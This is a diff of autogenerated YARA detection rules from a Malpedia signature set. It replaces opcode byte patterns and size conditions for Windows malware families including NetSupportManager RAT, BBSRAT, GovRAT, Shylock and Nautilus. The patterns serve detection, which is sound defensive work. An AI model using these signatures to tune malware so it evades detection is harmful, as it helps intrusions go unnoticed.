MALPEDIA_Win_Mgbot_Auto : FILE +rule MALPEDIA_Win_Prikormka_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "dd03dc94-bb3a-5cad-8f13-4bbe4b7f90a6" + id = "942667ef-c0ed-5e6f-acdd-388f6c8d0b49" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mgbot" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.mgbot_auto.yar#L1-L114" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.prikormka" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.prikormka_auto.yar#L1-L426" license_url = "N/A" - logic_hash = "7310ce51cc81391fc78e9881bf8f490b2a783d4789728f7661df3e6bdca512d7" + logic_hash = "7c65eb7008c5e728405addd601d63974803e3912597af2618d49b7f4b185b6c5" score = 75 - quality = 75 + quality = 50 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -142996,32 +145845,69 @@ rule MALPEDIA_Win_Mgbot_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 6808020000 e8???????? 6804010000 8bf0 6a00 } - $sequence_1 = { 6808020000 e8???????? 6804010000 8bf0 6a00 56 e8???????? } - $sequence_2 = { 5b 8be5 5d c20800 6808020000 } - $sequence_3 = { 6808020000 e8???????? 6804010000 8bf0 6a00 56 } - $sequence_4 = { 8be5 5d c20800 6808020000 e8???????? } - $sequence_5 = { 6808020000 e8???????? 6804010000 8bf0 } - $sequence_6 = { 5d c20800 6808020000 e8???????? } - $sequence_7 = { 8be5 5d c20800 6808020000 } - $sequence_8 = { 5b 8be5 5d c20800 6808020000 e8???????? } - $sequence_9 = { 0f8553ffffff 5f 33c0 5e } + $sequence_0 = { 8d0446 50 e8???????? 83c40c 6a00 56 } + $sequence_1 = { 8d1446 52 e8???????? 83c40c } + $sequence_2 = { ffd3 8b2d???????? 85c0 7405 } + $sequence_3 = { 51 e8???????? 83c40c 68???????? ffd7 } + $sequence_4 = { 85f6 7420 68???????? ffd7 } + $sequence_5 = { ff15???????? 68???????? ffd7 03c0 50 } + $sequence_6 = { 8b1d???????? 83c40c 6a00 56 ffd3 8b2d???????? } + $sequence_7 = { 56 ffd3 85c0 7405 6a02 56 } + $sequence_8 = { 740e 68???????? 50 ff15???????? ffd0 } + $sequence_9 = { 68???????? 6a00 6a00 ff15???????? 85c0 7502 59 } + $sequence_10 = { 83c40c 8d442404 50 ff15???????? 5e } + $sequence_11 = { 7408 41 42 3bce } + $sequence_12 = { 85c0 7502 59 c3 50 ff15???????? b801000000 } + $sequence_13 = { c3 57 6a00 6a00 6a00 6a02 } + $sequence_14 = { 68???????? ff15???????? 0fb7c0 6683f805 } + $sequence_15 = { ff15???????? ffd0 c705????????01000000 c705????????01000000 } + $sequence_16 = { 5e 85c0 7422 68???????? 50 } + $sequence_17 = { 0fb7c0 6683f805 7d09 b801000000 } + $sequence_18 = { 5e 85c0 7414 c705????????01000000 } + $sequence_19 = { 33f6 e8???????? e8???????? e8???????? e8???????? e8???????? e8???????? } + $sequence_20 = { 50 e8???????? 8b2d???????? 83c40c 6a00 } + $sequence_21 = { ff15???????? 8bf0 ff15???????? 3db7000000 751f 56 } + $sequence_22 = { 83c102 6685d2 75f5 2bce 8d1400 52 d1f9 } + $sequence_23 = { 75f5 8b0d???????? 2bc2 8b15???????? d1f8 } + $sequence_24 = { 751f 56 ff15???????? 33c0 } + $sequence_25 = { 6685c9 75f5 2bc6 8d0c12 } + $sequence_26 = { 2bc6 8d0c12 51 d1f8 } + $sequence_27 = { 8b35???????? 83c40c 68???????? ffd6 03c0 } + $sequence_28 = { 50 e8???????? b8???????? 83c40c 8d5002 } + $sequence_29 = { 75f5 8d0c12 2bc6 51 d1f8 8d544408 } + $sequence_30 = { d1f8 8d7102 8da42400000000 668b11 83c102 } + $sequence_31 = { 85c0 7409 6a02 68???????? } + $sequence_32 = { 50 ff15???????? 0fb74c2416 0fb7542414 } + $sequence_33 = { d1f8 8bd0 b8???????? 8d7002 8da42400000000 668b08 83c002 } + $sequence_34 = { 6685c9 75f5 2bc2 b9???????? d1f8 8d7102 668b11 } + $sequence_35 = { ffd6 50 68???????? 57 ffd6 03c7 50 } + $sequence_36 = { 56 57 68???????? 33ff 57 57 ff15???????? } + $sequence_37 = { e8???????? 83c40c eb0d 6a00 6800020000 } + $sequence_38 = { d1f8 8d7102 668b11 83c102 6685d2 75f5 8d1400 } + $sequence_39 = { 6685d2 75f5 8d1400 2bce 52 d1f9 } + $sequence_40 = { 6a00 6800020000 ff15???????? 68???????? } + $sequence_41 = { e8???????? 83c40c 6a00 68???????? ffd3 85c0 7409 } + $sequence_42 = { 6a5c 99 5f f7ff 83f801 } + $sequence_43 = { 0f87f5090000 ff248505eb0010 33c0 838df4fbffffff 8985a0fbffff } + $sequence_44 = { 48 48 8975f4 7479 83e848 745f } + $sequence_45 = { 56 8bc3 2bc1 6a5c 99 } + $sequence_46 = { 32a832d232e0 32e6 3209 3310 3329 333d???????? 335f33 } condition: - 7 of them and filesize <1677312 + 7 of them and filesize <401408 } -rule MALPEDIA_Win_Rook_Auto : FILE +rule MALPEDIA_Win_Farseer_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "18a58274-365f-5d90-8056-28a56db76f76" + id = "bdb1b674-d96e-50d4-8dbe-83cb253d9330" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rook" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.rook_auto.yar#L1-L129" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.farseer" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.farseer_auto.yar#L1-L129" license_url = "N/A" - logic_hash = "8b05af9f0d6f5102cdf2e062676438cba9dcdb9d6b25adc560d5025ee81a7b52" + logic_hash = "17f8792326231b41b2e91221ee87a535fdccf3e2e964ba78d0722fea338c91a0" score = 75 quality = 75 tags = "FILE" @@ -143035,32 +145921,32 @@ rule MALPEDIA_Win_Rook_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 488d05478d0200 c7470801000000 48c7471003000000 48894748 488d05c59e0200 } - $sequence_1 = { 0f8521ffffff 44882b eb7b 488b9540070000 4c8d05979e0000 498bce } - $sequence_2 = { 85c0 0f85f5020000 488b8d08080000 488d85f8070000 4c89a424c0080000 488d15ffb90400 } - $sequence_3 = { ff15???????? 488bd3 488d0d82ac0400 448bc0 e8???????? 488b0d???????? 4c8bc3 } - $sequence_4 = { 4433d0 418bc1 48c1e808 0fb6c8 41c1e208 420fb6843170990500 4433d0 } - $sequence_5 = { 488d85f8070000 4c89a424c0080000 488d15ffb90400 4889442428 4c8d25d3450500 4c89ac24b8080000 } - $sequence_6 = { 488d542460 488d0d1c380500 e8???????? 488d9510020000 498bcc ff15???????? 4839bd10020000 } - $sequence_7 = { 48894760 488d0535980200 c7475001000000 48c7475804000000 48894778 488d050b710300 c7476801000000 } - $sequence_8 = { 4898 4d8d3446 83ed01 7586 4885f6 0f84d3000000 488bce } - $sequence_9 = { 4c8d05f7140300 488986b0000000 488d8e98000000 e8???????? 8bd8 85c0 0f8517ffffff } + $sequence_0 = { 8d4c2434 e8???????? eb10 6a06 68???????? 8d4c2438 } + $sequence_1 = { 50 8d4c2440 51 8d542478 } + $sequence_2 = { e8???????? 8d742414 e8???????? 53 50 83c8ff 8d742438 } + $sequence_3 = { 8d442434 50 e8???????? c68424c402000002 8b8424cc000000 bb10000000 399c24e0000000 } + $sequence_4 = { 0f8c6cffffff 33ed 8d9424ac010000 68???????? 52 e8???????? 83c408 } + $sequence_5 = { 33db 6aff 899c2498000000 53 8d8424a4000000 be0f000000 50 } + $sequence_6 = { 7510 8bc1 eb0c 0fb6c9 0fbe8940454200 03c1 40 } + $sequence_7 = { 83c404 83bc24e402000010 7210 8b9424d0020000 52 e8???????? 83c404 } + $sequence_8 = { 85410c 7405 e8???????? 8d742440 e8???????? 85c0 } + $sequence_9 = { e9???????? 8bc3 c1f805 8d048520634200 83e31f 8985e4efffff 8b00 } condition: - 7 of them and filesize <843776 + 7 of them and filesize <347328 } -rule MALPEDIA_Win_Metadatabin_Auto : FILE +rule MALPEDIA_Win_Netsupportmanager_Rat_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "ddd31612-5b1e-5a32-9ee2-3a06fec41c32" + id = "cef2dd3b-0f7d-59a7-a048-7ced175e981a" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.metadatabin" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.metadatabin_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.netsupportmanager_rat" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.netsupportmanager_rat_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "11b64ee680ef1e61921c6aade590c08f83cd6a9ae0a068d4e02dca568fca78c2" + logic_hash = "79986ba5845ddb197c2cbb664d974c015a806cc2574092a014c092c0439de61a" score = 75 quality = 75 tags = "FILE" @@ -143074,32 +145960,32 @@ rule MALPEDIA_Win_Metadatabin_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 89d1 89c6 8b8424d0000000 11d9 0f92c3 f7e7 89c7 } - $sequence_1 = { 8bbde8feffff 0f44c8 01fa 39da 0f4cd3 85ff 0f45da } - $sequence_2 = { 8b8c2488000000 13442448 897c243c 660f6e4c243c 89f7 8b74245c 83d300 } - $sequence_3 = { 8b742414 8b542424 39de 0f841c010000 0f836e010000 0fb7447430 0512230000 } - $sequence_4 = { 8b85f8feffff c744240800000000 895c2404 890424 ff95f4feffff c785fcfeffff01000000 8b8568feffff } - $sequence_5 = { f7e3 8b5c2470 01c8 89842458010000 0fb6442428 11c2 89d8 } - $sequence_6 = { 897c240c 89fa 89c7 b8ffff0700 660f6e8c2420010000 83d700 660f6e5c240c } - $sequence_7 = { 8d34c0 89442424 01f6 01d1 8b542408 11fe 8b7c241c } - $sequence_8 = { 89d3 89442418 89f8 039c2480010000 83d100 f7642460 01d8 } - $sequence_9 = { 660f70d044 660fefe6 f30f6fb42460050000 660fdbe2 660fefdc 660fefa424a0000000 660f6fc1 } + $sequence_0 = { ff15???????? 8b7df0 3bfb c745fcffffffff 7410 8bcf e8???????? } + $sequence_1 = { f3a4 8d4dfc 51 e8???????? 83c404 663dffff 668945dc } + $sequence_2 = { e8???????? 8bcb e8???????? 8b4510 8b08 894b34 8b5004 } + $sequence_3 = { ff15???????? 85ff 7417 8b1b 81e7ffff0000 6a00 57 } + $sequence_4 = { c644020400 e8???????? 8b8558ffffff 83c404 85c0 7514 8b9550ffffff } + $sequence_5 = { e8???????? 8b9750030000 52 e8???????? 8b450c 8b7510 83c408 } + $sequence_6 = { ff15???????? 85c0 750e 8b45e8 8b4de4 50 51 } + $sequence_7 = { e8???????? eb02 33c0 c645fc01 8bf0 3bf3 7547 } + $sequence_8 = { e9???????? 686c010000 e8???????? 8bf0 83c404 897508 85f6 } + $sequence_9 = { 8d4df0 c745fc00000000 e8???????? 8b4704 85c0 7609 83f8ff } condition: - 7 of them and filesize <1263616 + 7 of them and filesize <4734976 } -rule MALPEDIA_Win_Mykings_Spreader_Auto : FILE +rule MALPEDIA_Win_Bbsrat_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "96a12e80-b15f-580e-920d-d6c0d35464b0" + id = "1bf7f125-76bf-51d8-8714-b1f4351a2fc5" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mykings_spreader" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.mykings_spreader_auto.yar#L1-L132" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bbsrat" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.bbsrat_auto.yar#L1-L131" license_url = "N/A" - logic_hash = "1bcd674173fea4b83a2f4219e8f61306a972490f94a89cfaf5e1f466fdec8eff" + logic_hash = "d09c46b568c20e6cc1497fd9b00b10dfec3bd249a240c9cb1f2d27667bcf264d" score = 75 quality = 75 tags = "FILE" @@ -143113,32 +145999,32 @@ rule MALPEDIA_Win_Mykings_Spreader_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 7519 51 55 8bce e8???????? 6a00 6a00 } - $sequence_1 = { 8b1e ff938c000000 8b0424 8b5014 85d2 7507 bf00000000 } - $sequence_2 = { e8???????? 837e1800 7439 8b4620 c1e003 89c7 8b4618 } - $sequence_3 = { 89c1 c745f401000000 3b4df4 723d ff4df4 8d7600 ff45f4 } - $sequence_4 = { 68???????? 50 ff15???????? a3???????? 83c0fe 40 40 } - $sequence_5 = { 8942fc 89d8 c1f81f 8b1424 8b7208 8b4a0c 29de } - $sequence_6 = { eb02 b300 e8???????? 8d45cc e8???????? c745cc00000000 58 } - $sequence_7 = { 33d2 b9???????? 8bc2 8bf2 c1f805 83e61f 8b0485a02e4100 } - $sequence_8 = { 89d8 29f0 85c0 7e39 8b55f4 85d2 7505 } - $sequence_9 = { 8b7508 8b36 8975c8 8b7d08 8b7f04 } + $sequence_0 = { e8???????? 8b7c2410 81c610020000 d1eb 45 85db 75b5 } + $sequence_1 = { 83c8ff 898e44020000 899648020000 57 894308 894304 8903 } + $sequence_2 = { 03c0 03c0 50 898374010000 e8???????? 8b8b74010000 83c404 } + $sequence_3 = { 8be5 5d c20c00 51 e8???????? 5e 5b } + $sequence_4 = { ffd7 895e24 8b461c 3bc3 741a 53 50 } + $sequence_5 = { eb21 83f805 7529 8d8c243c010000 51 8d842448030000 e8???????? } + $sequence_6 = { ff15???????? 8bf8 6a10 56 6861001100 } + $sequence_7 = { 52 8d6e18 55 8d7e0c 57 894608 e8???????? } + $sequence_8 = { ffd7 a3???????? 85c0 7412 8d4c2408 51 } + $sequence_9 = { 6a00 52 8bd8 56 895c2428 ff15???????? 8b4f0c } condition: - 7 of them and filesize <1581056 + 7 of them and filesize <434176 } -rule MALPEDIA_Win_Saint_Bot_Auto : FILE +rule MALPEDIA_Win_Govrat_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "714c3147-1158-5cc4-a0a2-d44deb9955a4" + id = "1d47ae50-0c56-5989-81a0-8fdce95f6d20" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.saint_bot" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.saint_bot_auto.yar#L1-L126" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.govrat" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.govrat_auto.yar#L1-L129" license_url = "N/A" - logic_hash = "74c58e6c0a61984f0e7d1e5e39218efbc9c3b95b70a89e37e515f61493396398" + logic_hash = "fd342f7d8be9492612f2ff02091e469b143bdad77d63d3ee372225f78d66c202" score = 75 quality = 75 tags = "FILE" @@ -143152,32 +146038,32 @@ rule MALPEDIA_Win_Saint_Bot_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 85f6 7432 837d10ff 7405 3b5d10 744f 6a04 } - $sequence_1 = { 894df8 894dec ff15???????? 8d45ec 50 8d45f8 50 } - $sequence_2 = { 668945e8 83c002 668945ea 8d45e0 8945d0 } - $sequence_3 = { c3 55 8bec 8b550c 53 0fb71a 6685db } - $sequence_4 = { 6a78 68f0000000 b800000080 50 50 680000cf00 } - $sequence_5 = { 85c0 0f84c7000000 85ff 7404 c6043800 } - $sequence_6 = { 58 6a63 668945cc 58 6a30 } - $sequence_7 = { 56 57 e8???????? ff75f0 56 57 e8???????? } - $sequence_8 = { 57 ff15???????? 56 6880000000 6a02 56 } - $sequence_9 = { 8bf0 ff15???????? 6a00 6a06 56 6a04 50 } + $sequence_0 = { 7725 0fb74002 8d709f 6683fe19 7702 03c2 6685c0 } + $sequence_1 = { ff37 e8???????? 894620 85c0 7507 b80e000780 5f } + $sequence_2 = { e8???????? 83ec1c 8bf4 8965b4 } + $sequence_3 = { e8???????? 6aff 53 8d4db0 51 c645fc06 e8???????? } + $sequence_4 = { 837dc808 8b75b4 7303 8d75b4 53 51 68???????? } + $sequence_5 = { 8d7c2428 ab ab 7548 8d442464 50 } + $sequence_6 = { 0183f0bc0300 8393f4bc030000 e8???????? eb1d 8b45fc 2b45f0 ff75fc } + $sequence_7 = { 7311 c70485????????e8814300 40 a3???????? c3 55 8bec } + $sequence_8 = { 83ec18 56 8bf1 8b4610 8955f8 8945f4 83f804 } + $sequence_9 = { 85f6 7403 832600 837d1000 0f8690000000 8b5d08 } condition: - 7 of them and filesize <93184 + 7 of them and filesize <761856 } -rule MALPEDIA_Win_Elirks_Auto : FILE +rule MALPEDIA_Win_Chthonic_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "abbbcbca-d514-5806-9c10-833d31c8983a" + id = "a742c49c-6e3e-5872-bf95-e2e0adb04114" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.elirks" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.elirks_auto.yar#L1-L120" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.chthonic" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.chthonic_auto.yar#L1-L120" license_url = "N/A" - logic_hash = "4de38c5bbb938b8f52d51f635312140a804238195b0d5824203719bed438cd32" + logic_hash = "836fdc80a654c12e0017df0790b315dbe177f1e5fd0fa5cd260efc9eb4af2475" score = 75 quality = 75 tags = "FILE" @@ -143191,32 +146077,32 @@ rule MALPEDIA_Win_Elirks_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8d4c2414 51 68???????? 8bf0 ff15???????? } - $sequence_1 = { 85c0 7417 8b44241c 01442414 03f0 2bf8 e9???????? } - $sequence_2 = { 51 8d44241c e8???????? 8b8e04600000 83c404 } - $sequence_3 = { 83c102 66c7012d00 83c102 66c7012d00 83c102 83ef03 83c603 } - $sequence_4 = { 68???????? 8d442430 e8???????? 83c40c } - $sequence_5 = { 7fe8 85ff 0f84a1010000 85ff 7e25 } - $sequence_6 = { c1f803 0faf4608 894614 6a68 } - $sequence_7 = { 52 ff15???????? 8bd8 83fbff 895c2410 7546 } - $sequence_8 = { 8d8c2490060000 51 6804010000 ff15???????? 8d9e0c600000 53 6a00 } - $sequence_9 = { 750b 57 e8???????? 83c404 5e c3 } + $sequence_0 = { 7459 4f 8bf0 8bcf d3ee 83e601 } + $sequence_1 = { 0f845d010000 4f 8bf0 8bcf } + $sequence_2 = { 81cf00ffffff 47 8a01 8845ff 8d84bdfcfbffff 8b10 } + $sequence_3 = { 80e17f 8808 b001 5b c3 55 } + $sequence_4 = { 8b75f8 83fe02 0f850d010000 8b4df0 } + $sequence_5 = { 016e04 83c703 013e 8b36 83c410 } + $sequence_6 = { 5e 0f94c0 5b c9 c3 8b041a } + $sequence_7 = { 53 ff7510 ff7508 e8???????? 85c0 } + $sequence_8 = { 80e17f 8808 b001 5b c3 55 8bec } + $sequence_9 = { ff751c ff7518 ff7514 53 ff7510 ff7508 e8???????? } condition: - 7 of them and filesize <81920 + 7 of them and filesize <425984 } -rule MALPEDIA_Win_Himera_Loader_Auto : FILE +rule MALPEDIA_Win_Remy_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "e46aed8f-6384-5100-b12a-1e2dd8afe756" + id = "7ce97943-cfc3-5429-92c7-f07c9ff48391" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.himera_loader" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.himera_loader_auto.yar#L1-L127" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.remy" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.remy_auto.yar#L1-L129" license_url = "N/A" - logic_hash = "ec88d24287290abbd140c4f0211e2582e892064d8e933b967abedc9a00192e9f" + logic_hash = "8cc4f887faa36fa3ebf369fe88c2b140d588410f99b73c322f37daf8b5d5619a" score = 75 quality = 75 tags = "FILE" @@ -143230,32 +146116,32 @@ rule MALPEDIA_Win_Himera_Loader_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e8???????? 83c408 8b4dfc 6689411e 6a10 } - $sequence_1 = { 64a300000000 894de0 c745dc0c000000 c645e45e c645e55d } - $sequence_2 = { 8b4d08 0fb71401 52 e8???????? 83c408 8b4dfc 66894130 } - $sequence_3 = { 8d85dcfdffff 50 8d8df8feffff 51 8d95f8feffff 52 8d8deffdffff } - $sequence_4 = { c20400 e8???????? 85c0 0f84c1510000 } - $sequence_5 = { c645eb1c c645ec2e 64a12c000000 8b08 8b15???????? 3b9104000000 7e4c } - $sequence_6 = { 50 8d45f4 64a300000000 894de0 c745dc0a000000 c645e440 c645e55a } - $sequence_7 = { c7459c49000000 c645a463 c645a541 c645a654 c645a747 c645a842 c645a942 } - $sequence_8 = { c645e801 c645e90e c645ea18 c645eb1a c645ec00 c645ed1e c645ee2e } - $sequence_9 = { c745fc00000000 eb09 8b45fc 83c001 8945fc 837dfc25 7321 } + $sequence_0 = { 83c404 3bc3 7420 50 8bc6 8d7c241c } + $sequence_1 = { 56 81c30f010000 53 e8???????? 8d46f0 } + $sequence_2 = { 3dc8000000 0f85c50b0000 6a28 8d742424 895c2424 895c2428 895c242c } + $sequence_3 = { 5d c3 8b7dfc 8d4fff 81f9ffff0000 7728 } + $sequence_4 = { 7451 8d4634 898638100000 8d8634100000 c70000100000 895d0c 895d08 } + $sequence_5 = { 51 8d570c 52 e8???????? 83c40c 8b4508 83c010 } + $sequence_6 = { 8b5604 2bc8 2bd0 c1f902 c1fa02 3bd1 } + $sequence_7 = { 8d8748100000 57 8908 8d4da4 51 8d55a0 52 } + $sequence_8 = { 8d4d90 e8???????? 83c41c c645fc02 895e40 8bff 8b4d94 } + $sequence_9 = { 50 ff15???????? 8b95b4feffff 52 ff15???????? 8b4df4 64890d00000000 } condition: - 7 of them and filesize <385024 + 7 of them and filesize <507904 } -rule MALPEDIA_Win_Tellyouthepass_Auto : FILE +rule MALPEDIA_Win_Shylock_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "2f59ff80-ce55-5261-bc1e-9b9085ba348c" + id = "c0c6612f-064a-5f55-82bb-f58e63a548a1" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tellyouthepass" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.tellyouthepass_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.shylock" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.shylock_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "e0931a30828c9c1e2a42766d85093d9ba189ed49cc692d748a9e549b96d308d1" + logic_hash = "2cab0a97d5d39d5cf87c312cbde6ff184fa1776200cc626b918f5dce9951a83d" score = 75 quality = 75 tags = "FILE" @@ -143269,32 +146155,32 @@ rule MALPEDIA_Win_Tellyouthepass_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 4c895c2438 48895c2430 e8???????? 488d05e4021a00 bb1d000000 e8???????? 488b442450 } - $sequence_1 = { 488d05a4bf1700 bb13000000 0f1f440000 e8???????? 8b442414 89c0 e8???????? } - $sequence_2 = { e8???????? 488b442428 e8???????? 488d0509dd1700 bb07000000 e8???????? 488b442420 } - $sequence_3 = { e9???????? 488d05231a3400 31db 488b6c2458 4883c460 c3 48895c2470 } - $sequence_4 = { 7506 48894208 eb09 488d7a08 e8???????? 488bac24f8000000 4881c400010000 } - $sequence_5 = { c3 440fb6ac24080a0000 4584ed 0f8471030000 4983fc07 0f85aa010000 4c8b4828 } - $sequence_6 = { e8???????? e8???????? 488b4818 488b5820 488b5028 4889c8 4889d1 } - $sequence_7 = { 498d7a78 e8???????? 498b9050010000 498b9858010000 498bb060010000 49899a98000000 4989b2a0000000 } - $sequence_8 = { 84c0 0f8566feffff 31c0 488b6c2418 4883c420 c3 31c0 } - $sequence_9 = { 0f1f00 e8???????? 31db 31c9 488d3d501c0c00 4889c6 31c0 } + $sequence_0 = { e8???????? 8d8534ffffff 50 b8???????? e8???????? 59 50 } + $sequence_1 = { 8db544ffffff e8???????? 8bc6 50 8d45f8 e8???????? ff30 } + $sequence_2 = { c22c00 0fb64001 50 8d45c8 50 8b45d4 8b30 } + $sequence_3 = { c745fc04010000 ff75e4 e8???????? 83c410 ff45f8 3d03010000 0f8559ffffff } + $sequence_4 = { e8???????? 3c01 743b 8d8588feffff 50 b8???????? e8???????? } + $sequence_5 = { 57 8b7d08 8b4d0c 8a4510 fc f2ae 7504 } + $sequence_6 = { 8945b0 8d856cffffff 50 8b45fc ff7018 ff9540ffffff 898534ffffff } + $sequence_7 = { 8d75f8 8bfc e8???????? 8d8504ffffff 50 ff7508 e8???????? } + $sequence_8 = { 51 33d2 8d5df8 e8???????? 8d45ec e8???????? 8bf8 } + $sequence_9 = { e8???????? e8???????? 59 59 8bf0 e8???????? 8d75fc } condition: - 7 of them and filesize <7152640 + 7 of them and filesize <630784 } -rule MALPEDIA_Win_Ismdoor_Auto : FILE +rule MALPEDIA_Win_Nautilus_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "e9177277-98bb-546b-913b-803dfeefda39" + id = "bd0f8568-9347-5c4b-aef6-8e7929cf6017" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ismdoor" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.ismdoor_auto.yar#L1-L156" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nautilus" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.nautilus_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "489ff4b41f2f5bc83c56e62265d852f18476e83488ad914ef361d6d410139690" + logic_hash = "6e0983236c8ba852bb2af3aa295c07b825fa6ac12512321743324e3ea59238a7" score = 75 quality = 75 tags = "FILE" @@ -143308,37 +146194,32 @@ rule MALPEDIA_Win_Ismdoor_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 83f8ff 7504 32c0 eb05 c0e804 2401 84c0 } - $sequence_1 = { 90 48897c2428 488d4da0 48894c2420 4c8d4d80 4c8bc3 } - $sequence_2 = { 7405 488b00 ebdd 48894500 } - $sequence_3 = { 89442420 48c7411807000000 48894110 668901 c744242001000000 } - $sequence_4 = { 7613 498d4970 418bc2 41ffc2 } - $sequence_5 = { 41ffc7 0f1f4000 418b16 488d4d38 e8???????? } - $sequence_6 = { 8bd8 33c9 ff15???????? 488bc8 } - $sequence_7 = { 488bd6 488bcf ff5030 488bc8 } - $sequence_8 = { 884c0dd8 41 83f910 7cf6 } - $sequence_9 = { 83f802 7506 c6473c00 eb04 40 } - $sequence_10 = { 8b4804 83b9ec97480000 0f94c0 8845e4 c745fc01000000 } - $sequence_11 = { c745f804000000 57 8a68fe 8d4004 8a48fb 8a78fc } - $sequence_12 = { 886dff 81e61f000080 7905 4e 83cee0 46 } - $sequence_13 = { e8???????? 83c404 c744246c0f000000 c744246800000000 c644245800 837c243c08 } - $sequence_14 = { 75f2 8b7d10 8b07 3bf0 7421 8b4f04 } + $sequence_0 = { 8bcf e8???????? 8bd8 8bcd e8???????? 85db 8bce } + $sequence_1 = { 85c0 740c 488b4598 4833c7 e9???????? c74424200f000000 e9???????? } + $sequence_2 = { 8bfe 486313 488d0dcc340600 f6040a02 744b 418d46fa 488bcb } + $sequence_3 = { 85c0 7892 488d4c2430 498bd4 e8???????? 85c0 7981 } + $sequence_4 = { ba03000000 4d8bc5 8d4aff e8???????? 4c8be0 4885c0 7509 } + $sequence_5 = { 85f6 750c 33c0 eb3a 488b0b 49890e eb30 } + $sequence_6 = { 85c0 79d6 4c8d45cf 488d55cf 488d4db7 e8???????? 8bd8 } + $sequence_7 = { eb07 c745e006000000 488d45e0 41b912000000 4d8bc4 498bd5 488bcf } + $sequence_8 = { 4883f803 0f8cef010000 488bd3 488bcd ff95c8010000 85c0 0f8599feffff } + 